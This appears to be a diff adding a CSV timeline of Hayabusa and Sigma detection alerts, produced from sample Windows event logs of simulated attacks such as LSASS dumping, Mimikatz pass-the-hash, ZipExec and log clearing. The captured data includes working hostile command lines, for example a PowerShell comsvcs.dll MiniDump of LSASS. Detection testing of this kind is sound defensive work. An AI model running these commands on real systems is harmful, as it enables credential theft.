+2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding  :  Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
+2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx
+2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx
+2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: -  :  SID: S-1-5-21-3410678313-1251427014-1131291384-1004  :  Group: None  :  Subject user: admmig  :  Subject domain: OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
+2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3  :  SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
+2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx
+2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx
+2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig  :  Workstation: -  :  IP Address: ::1  :  Port: 0  :  LogonID: 0x266e045  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: OFFSEC\admmig  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: ""C:\Windows\System32\rundll32.exe""  C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full  :  Path: C:\Windows\System32\rundll32.exe  :  User: OFFSEC\admmig  :  Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
+2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 49192  :  LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 38940  :  LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 54742  :  LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 54742  :  LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 54742  :  LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\2V7Be7Gq.dmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\2V7Be7Gq.dmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Temp\2V7Be7Gq.dmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
+2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
+2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe  //e:jscript testme.js  :  Path: C:\Windows\System32\cscript.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:""""  :  Path: C:\Windows\System32\cmdkey.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: cscript.exe  //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe""   :  Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: cscript.exe  //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip  :  Path: C:\Windows\System32\cmdkey.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: cscript.exe  //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe""  popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png""  :  Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx
+2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer  :  URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: mimikatz.exe  :  Path: C:\TOOLS\Mimikatzx64\mimikatz.exe  :  User: OFFSEC\admmig  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx
+2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
+2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
+2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Sysmon\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
+2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: -  :  Type: 10  :  Workstation: -  :  IP Address: 10.23.23.9  :  SubStatus: 0x0  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx
+2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: -  :  Type: 10  :  Workstation: -  :  IP Address: 10.23.23.9  :  SubStatus: 0x0  :  AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx
+2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
